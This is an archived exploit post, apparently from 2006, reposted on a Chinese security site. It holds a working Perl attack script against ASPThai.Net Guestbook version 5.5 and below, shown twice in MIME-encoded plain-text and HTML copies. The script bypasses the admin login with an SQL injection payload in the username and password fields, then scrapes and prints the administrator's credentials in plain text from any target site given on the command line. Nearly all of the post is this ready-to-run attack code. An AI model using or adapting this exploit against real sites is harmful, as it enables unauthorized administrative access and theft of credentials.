首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5
来源:http://www.g00ns.net 作者:Zodiac 发布时间:2006-02-08  

------=_Part_9669_22649246.1139201383091
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for
ASPThai.Net Guestbook <=3D 5.5 and POSSIBLY higher" The sql injection takes
place in admin.asp. IF injected with special characters into the login it
will grant u with admin..BUT we wrote wrote some code to grab plaintext use=
r
and pass..here is the code


#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In
plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and
anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email =3D zodiac@g00ns.net
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;


$Server =3D $ARGV[0];

if($Server =3D~m/http/g)
{
$Server=3D~ 'http://$Server';
print
}

else {
print $error;
}


if(!$Server) {usage();exit() ;}

head();

print "\r\nGrabbing Username And Password\r\n\n";

#Login's and stores a cookie to view admin panel later


$xpl =3D LWP::UserAgent->new() or die;
$cookie_jar =3D HTTP::Cookies->new();

$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);

$res =3D $xpl->post(
$Server.'check_user.asp',
Content =3D> [


'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',
'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',
'Submit' =3D> '-=3D Login =3D-',
],
);

# Create a request
my $req =3D HTTP::Request->new(GET =3D>

$Server.'change_admin_username.asp'

);

$req->header('Referer', $Server.'admin_menu.asp');

my $res =3D $xpl->request($req);

$info=3D $res->content;

if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}


#Check the outcome of the response

$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$User =3D $2;
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$Pass=3D $2;


print "UserName:$User\r\nPassword:$Pass\r\n";

sub head()
{
print
"\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by
www.g00ns.net*\r\n";
print
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g.
http://www.site.com/guestbook/\r\n";
print
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
exit();
}

its been out for like 2 days now..

------=_Part_9669_22649246.1139201383091
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<div>I MurderSkillz from <a href=3D"http://g00ns.net">g00ns.net</a> found a=
vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and=
POSSIBLY higher" The sql injection takes place in admin.asp. IF injec=
ted with special characters into the login it will grant u with admin..BUT =
we wrote wrote some code to grab plaintext user and pass..here is the code
</div>
<div> </div>
<div>
<p>#!/usr/bin/perl<br># SQL Injection Exploit for ASPThai.Net Guestbook <=
;=3D 5.5  <br>#(And possible higher could not find a site to test it o=
n)<br># This exploit shows the username of the administrator and the passwo=
rd In plain text
<br># Bug Found by muderskillz Coded by Zodiac<br># Shouts to cijfer,uid0,|=
n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.<br># <=
a href=3D"http://exploitercode.com/">http://exploitercode.com/</a> <a href=
=3D"http://www.g00ns.net/">
http://www.g00ns.net</a> <br>#irc.g00ns.net #g00ns  email =3D <a href=
=3D"mailto:zodiac@g00ns.net">zodiac@g00ns.net</a><br>#(c) 2006</p>
<p>use LWP::UserAgent;<br>use HTTP::Cookies;</p>
<p><br>$Server =3D $ARGV[0];</p>
<p>if($Server =3D~m/http/g)<br>{<br>$Server=3D~ 'http://$Server';<br>print =
<br>}</p>
<p>else {<br>  print $error;<br>}</p>
<p> </p>
<p><br>if(!$Server) {usage();exit() ;}</p>
<p>head();</p>
<p> </p>
<p>print "\r\nGrabbing Username And Password\r\n\n";</p>
<p> </p>
<p>#Login's and stores a cookie to view admin panel later</p>
<p><br> $xpl =3D LWP::UserAgent->new() or die;<br> $cookie_jar=
=3D HTTP::Cookies->new();</p>
<p> $xpl->agent('g00ns');<br> $xpl->cookie_jar($cookie_jar)=
;</p>
<p> $res =3D $xpl->post(<br> $Server.'check_user.asp',<br>&nbs=
p;Content =3D> [ </p>
<p><br> 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30=
%6e%73', <br> 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67=
%30%30%6e%73',<br> 'Submit' =3D> '-=3D Login =3D-',<br> ],<br>=
 );</p>
<p> </p>
<p># Create a request<br>my $req =3D HTTP::Request->new(GET =3D> </p>
<p>$Server.'change_admin_username.asp'</p>
<p>);</p>
<p>$req->header('Referer', $Server.'admin_menu.asp');</p>
<p> </p>
<p>my $res =3D $xpl->request($req);</p>
<p>$info=3D $res->content;</p>
<p>if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) <br>=
{ <br> die "Error Connecting...\r\n"; <br>}</p>
<p> </p>
<p><br>#Check the outcome of the response</p>
<p> </p>
<p>$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$User =3D $2;<br>$info=
=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$Pass=3D $2;</p>
<p><br>print "UserName:$User\r\nPassword:$Pass\r\n";</p>
<p> </p>
<p>sub head()<br> {<br> print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> print "* ASPT=
hai.Net Guestbook version 5.5 SQL Injection by <a href=3D"http://www.g00ns.=
net/">
www.g00ns.net</a> *\r\n";   <br> print "=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> =
}<br>sub usage()<br> {<br> head();<br> print " Usage: T=
haisql.pl <Site>  \r\n\n";
<br> print " <Site> - Full path to Guestbook e.g. <a href=
=3D"http://www.site.com/guestbook/">http://www.site.com/guestbook/</a> \r\n=
";<br> print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D\r\n";
<br> print "   -=3DCoded by Zodiac, Bug Found by Murder=
Skillz=3D-\r\n";<br> print "<a href=3D"http://www.exploiterc=
ode.com/">www.exploitercode.com</a> <a href=3D"http://www.g00ns.net/">www.g=
00ns.net</a> <a href=3D"http://irc.g00ns.net">
irc.g00ns.net</a> #g00ns\r\n";<br> print "=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> exit();<b=
r> }</p>
<p> </p>
<p>its been out for like 2 days now..<br> </p></div>

------=_Part_9669_22649246.1139201383091--



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Qualcomm WorldMail IMAP Server
·Proof of concept exploit that
·Arescom NetDSL-1000 TelnetD Do
·MyQuiz version 1.01 remote com
·SamiFTPd USER buffer overflow
·Eudora Qualcomm WorldMail IMAP
·Mozilla Firefox location.Query
·Mozilla Firefox location.Query
·[xfocus-SD-060206]BCB compiler
·SPIP <= 1.8.2-g spip_log an
·Microsoft HTML Help Workshop .
·Local root exploit for QNX Neu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved